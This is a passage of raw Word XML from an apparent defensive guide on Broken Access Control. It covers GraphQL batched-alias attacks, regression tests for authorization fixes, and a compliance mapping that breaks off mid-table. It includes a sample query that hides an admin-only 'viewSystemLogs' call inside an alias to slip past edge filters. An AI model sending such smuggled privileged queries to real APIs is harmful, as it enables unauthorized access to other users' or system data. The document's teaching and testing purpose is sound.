        </w:rPr>
        <w:t xml:space="preserve"> occurrence (acct=victim), processing the query against the victim's data and exposing it to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A82EB60"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 xml:space="preserve">4. Nested / Batched </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C7E0A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments, traditional firewalls looking for REST-like paths (like /admin) are blind because all queries route through a single /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>graphql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint. Attackers hide unauthorized operations inside deep, batched aliases: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC405D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51CE1E01" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">query { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>lowPrivilegeAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> { id } </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>secretAdminAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>viewSystemLogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> { logs } # Hidden inside a standard batch payload }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61ED9E"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">If the internal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementation doesn't validate field-level permissions on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>viewSystemLogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> resolver, the attacker evades edge security filters completely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5BDC3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Verification &amp; Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ADA2F4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Fix Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E513E8F"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 xml:space="preserve">To ensure that an access control patch actually works—and that future updates won't accidentally break it again—security and QA teams must write deliberate, automated tests. You cannot simply verify that a valid user can access their own data; you must actively prove that an invalid user </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD9DE92"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1. Automated Unit &amp; Integration Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C7316"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Developers should write regression tests that mimic malicious requests as part of the continuous integration (CI/CD) pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C17EA22" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Unauthorized Guest Test (Unauthenticated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7DFDB5"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 xml:space="preserve">Assert that making a request to the patched endpoint </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> an Authorization header returns a 401 Unauthorized or 403 Forbidden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287ADD0D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Cross-Tenant/BOLA Test (Authenticated, Non-Owner):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7EFC77"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Create two distinct test user accounts in the test suite database (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>User_A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>User_B</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">). Initialize a client session authenticated as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>User_B</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. Attempt to call the endpoint requesting a resource owned by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>User_A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8124E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Assert:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application must reject the request with a 403 Forbidden status code, and the database record must remain unaltered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D33991"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2. Component-Level Configuration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125433A4"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If the fix was implemented at the framework routing layer (e.g., Spring Security or Django middleware), write structural tests to verify configuration boundaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DC463" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Route Guard Auditing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write a test that dynamically parses the application’s route registry and flags any newly created API endpoints that lack the mandatory authorization annotation or middleware wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1973F172"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3. Automated Behavioral &amp; DAST Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10024FF9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Negative Test Cases in Postman/Newman:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a collection of requests where parameters are altered to invalid values (e.g., negative numbers, empty strings, or string UUIDs swapped into integer fields). Run this collection against the staging environment automatically on every build to verify the API's error-handling boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2C7B8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Compliance Standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2274A387"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lastRenderedPageBreak/>
        <w:t>Because Broken Access Control deals directly with data confidentiality and isolation, nearly every major global compliance framework rigidly enforces its prevention, monitoring, and regular testing.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1994"/>
        <w:gridCol w:w="6409"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="54024379" w14:textId="77777777" w:rsidTr="00B064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B24908" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Compliance</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25A8B3B1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Specifc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Requirement / Mapping to Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="6B943EDC" w14:textId="77777777" w:rsidTr="00B064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E35F4E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>PCI-DSS</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>v4.0</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Payment</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Card</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Industry)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ECC382F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Requirement 7:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Restrict access to cardholder data by</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>business need-to-know.</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Requirement 8:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Identify users and authenticate access.</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Requirement 11:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
